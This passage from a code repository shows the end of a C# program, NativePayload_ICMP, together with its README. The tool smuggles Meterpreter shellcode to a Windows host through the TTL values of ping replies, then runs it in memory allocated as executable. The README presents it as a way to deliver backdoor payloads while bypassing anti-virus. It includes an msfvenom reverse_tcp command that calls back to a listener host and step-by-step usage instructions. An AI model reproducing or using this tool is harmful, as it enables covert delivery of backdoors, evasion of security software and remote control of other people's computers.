| } 254 | else if (init == false) 255 | { 256 | Console.ForegroundColor = ConsoleColor.DarkGreen; 257 | Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[0], getcode); 258 | } 259 | } 260 | else if (getcode == temp && getcode != "255") 261 | { 262 | Console.ForegroundColor = ConsoleColor.DarkGreen; 263 | Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[0], getcode); 264 | } 265 | 266 | System.Threading.Thread.Sleep(1000); 267 | temp = getcode; 268 | } 269 | else if (getcode == "255") 270 | { 271 | flag_end_count++; 272 | Console.ForegroundColor = ConsoleColor.DarkGreen; 273 | Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[0], getcode); 274 | 275 | System.Threading.Thread.Sleep(500); 276 | temp = getcode; 277 | if (flag_end_count >= 10) { flag_end = true; } 278 | } 279 | } 280 | 281 | end_time = DateTime.Now.ToString(); 282 | 283 | Console.WriteLine(end_time + " , Done "); 284 | 285 | byte[] __Bytes = new byte[Oonaggi.Length / 4]; 286 | int payload_dec_count = Oonaggi.Length / 4; 287 | int tmp_counter = 0; 288 | string current = null; 289 | int _0_to_2_ = 0; 290 | for (int d = 0; d < payload_dec_count; ) 291 | { 292 | string tmp1_current = (Oonaggi.Substring(tmp_counter, 2)); 293 | 294 | for (int j = 0; j <= 15; j++) 295 | { 296 | if (Convert.ToInt32(Hex_Dec_Table.Rows[j].ItemArray[0]) == Convert.ToInt32(tmp1_current)) 297 | { 298 | _0_to_2_++; 299 | 300 | current += (Hex_Dec_Table.Rows[j].ItemArray[1].ToString()); 301 | 302 | if (_0_to_2_ == 2) 303 | { 304 | Console.Write(current + " "); 305 | __Bytes[d] = Convert.ToByte(current, 16); 306 | _0_to_2_ = 0; 307 | d++; 308 | current = null; 309 | } 310 | 311 | } 312 | 313 | } 314 | 315 | tmp_counter++; 316 | tmp_counter++; 317 | 318 | } 319 | Console.WriteLine(); 320 | Console.ForegroundColor = ConsoleColor.Gray; 321 | Console.WriteLine("Bingo Meterpreter session by ICMPv4 traffic ;)"); 322 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)__Bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 323 | Marshal.Copy(__Bytes, 0, (IntPtr)(funcAddr), __Bytes.Length); 324 | IntPtr hThread = IntPtr.Zero; 325 | UInt32 threadId = 0; 326 | IntPtr pinfo = IntPtr.Zero; 327 | 328 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 329 | WaitForSingleObject(hThread, 0xFFFFFFFF); 330 | 331 | } 332 | } 333 | catch (Exception _main) 334 | { 335 | Console.WriteLine("Main Error: {0}", _main.Message); 336 | Console.WriteLine("Main Error: Please use help , NativePayload_ICMP help", _main.Message); 337 | 338 | 339 | } 340 | } 341 | 342 | 343 | static Dictionary HexDic = new Dictionary 344 | { 345 | //// {'0',200},{'1',201},{'2',202},{'3',203},{'4',204},{'5',205},{'6',206},{'7',207},{'8',208} 346 | //// ,{'9',209},{'a',210},{'b',211},{'c',212},{'d',213},{'e',214},{'f',215} 347 | 348 | {'0',100},{'1',101},{'2',102},{'3',103},{'4',104},{'5',105},{'6',106},{'7',107},{'8',108} 349 | ,{'9',109},{'a',110},{'b',111},{'c',112},{'d',113},{'e',114},{'f',115} 350 | }; 351 | 352 | static string _HextoDecimal(string hexstring) 353 | { 354 | 355 | string result = ""; 356 | hexstring = hexstring.ToLower(); 357 | for (int i = 0; i < hexstring.Length; i++) 358 | { 359 | char Oonagii = hexstring[hexstring.Length - 1 - i]; 360 | result += (HexDic[Oonagii] * (int)Math.Pow(16, i)).ToString() + " "; 361 | } 362 | return result; 363 | } 364 | 365 | 366 | static string _Ping(string IPAddress_DNSName, int counter) 367 | { 368 | string Final_Dec = ""; 369 | 370 | try 371 | { 372 | //// 1 is good idea ;) 373 | //// 1 is best performance by 1 request and one ping response (default) 374 | //// 2 is slow performance by 2 request and two ping response 375 | //// if you want use 2 then you should change Sleep in Linux sh file too 376 | //// so in code i changed this to 1 ;) , Sorry 377 | if (counter != 1) { counter = 1; } 378 | 379 | /// Make ICMPv4 traffic for getting Meterpreter Payloads by Ping 380 | ProcessStartInfo ns_Prcs_info = new ProcessStartInfo("ping.exe", IPAddress_DNSName + " -n " + counter.ToString()); 381 | ns_Prcs_info.RedirectStandardInput = true; 382 | ns_Prcs_info.RedirectStandardOutput = true; 383 | ns_Prcs_info.UseShellExecute = false; 384 | 385 | 386 | Process myPing = new Process(); 387 | myPing.StartInfo = ns_Prcs_info; 388 | myPing.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; 389 | myPing.Start(); 390 | 391 | //string result_Line0 = ""; 392 | string Pingoutput = myPing.StandardOutput.ReadToEnd(); 393 | string[] All_lines = Pingoutput.Split('\t', '\n'); 394 | 395 | //int PayloadLines_current_id = 0; 396 | foreach (var item in All_lines) 397 | { 398 | if (item.StartsWith("Reply ")) 399 | { 400 | Final_Dec = item.Substring(item.Length - 4); 401 | } 402 | // debug 403 | // Console.WriteLine(item + "\n"+ s); 404 | } 405 | 406 | 407 | } 408 | catch (Exception e) 409 | { 410 | 411 | Console.WriteLine(e.Message); 412 | } 413 | return Final_Dec; 414 | } 415 | 416 | public static UInt32 MEM_COMMIT = 0x1000; 417 | public static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 418 | 419 | [DllImport("kernel32")] 420 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 421 | [DllImport("kernel32")] 422 | private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); 423 | [DllImport("kernel32")] 424 | private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 425 | } 426 | } 427 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NativePayload_ICMP v1.0 2 | C# code Published by Damon Mohammadbagher 3 | 4 | Article step by step : https://www.peerlyst.com/posts/transfer-download-payload-by-icmpv4-traffic-via-ttl-damon-mohammadbagher 5 | 6 | 7 | NativePayload_ICMP : transfer Backdoor Payloads by ICMPv4 Traffic and bypassing Anti-Viruses 8 | 9 | Tested : Win7 SP1 and Win 2008 R2 10 | 11 | step by step: 12 | 13 | example step1 msfvenom --arch x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 -f c > payload.txt 14 | 15 | note: copy your msfvenom output payloads to 'Payload string' like 'fc4883e4f0e8cc00000415141505265' 16 | 17 | example step2 c:\\> NativePayload_ICMP.exe null "Payload string" > script.sh 18 | 19 | example step2 c:\\> NativePayload_ICMP.exe null fc4883e4f0e8cc00000415141505265 > script.sh 20 | 21 | example step3 c:\\> NativePayload_ICMP.exe ipaddress (sending ICMPv4 traffic to this ipaddress by ping) 22 | 23 | example step3 c:\\> NativePayload_ICMP.exe 192.168.1.50 24 | 25 | example step4 linux side ./script.sh (run this script in PING Responder linux system). 26 | 27 | note: after chmod also adding #!/bin/bash to script.sh file , you can run this script in PING Responder system. 28 | 29 | note: you should run this script in your linux after step3 for Response to PING traffic from backdoor system 30 | 31 | note: Backdoor system is win with NativePayload_ICMP.exe and ipaddress for example: 192.168.1.120 32 | 33 | note: PING Responder system is linux with ./script.sh and ipaddress for example : 192.168.1.50 34 | 35 | note: PING Responder system is also Meterpreter Listener by ipaddress : 192.168.1.50 36 | 37 | 38 | 39 | in this case after 1020 ping request and response you have Meterpreter Session by ICMPv4 40 | 41 | Dumping Payloads by TTL from PING Response... 42 | 43 | Meterpreter Payload is 510 bytes 44 | 45 | 510 * 2 = 1020 46 | 47 | 0 ... 1019 = 1020 Request 48 | 49 | 50 | 51 | # NativePayload_ICMP v2.0 52 | 53 | "NativePayload_ICMP.exe" v2.0 C# Code and Shell Script "NativePayload_ICMP.sh" v1.0 Released for Ebook. (May 2018 , bug fixed). 54 | 55 | NativePayload_ICMP.exe v2.0 syntax: 56 | NativePayload_ICMP.exe help 57 | 58 | NativePayload_ICMP.sh v1.0 syntax: 59 | step0 Client-Side with ipv4 w.x.y.z , syntax :./NativePayload_ICMP.sh shtext "your text or string" 60 | step1 Server-Side with ipv4 w1.x1.y1.z1 syntax :./NativePayload_ICMP.sh listen "w.x.y.z" 61 | Note: in step1 you should use Client-side system w.x.y.z IPv4Address 62 | help syntax : ./NativePayload_ICMP.sh help 63 | 64 | Download "NativePayload_ICMP.exe" v2.0 C# Code and Shell Script "NativePayload_ICMP.sh" v1.0 here : https://github.com/DamonMohammadbagher/NativePayload_ICMP/tree/master/EBOOK 65 | 66 |

67 | --------------------------------------------------------------------------------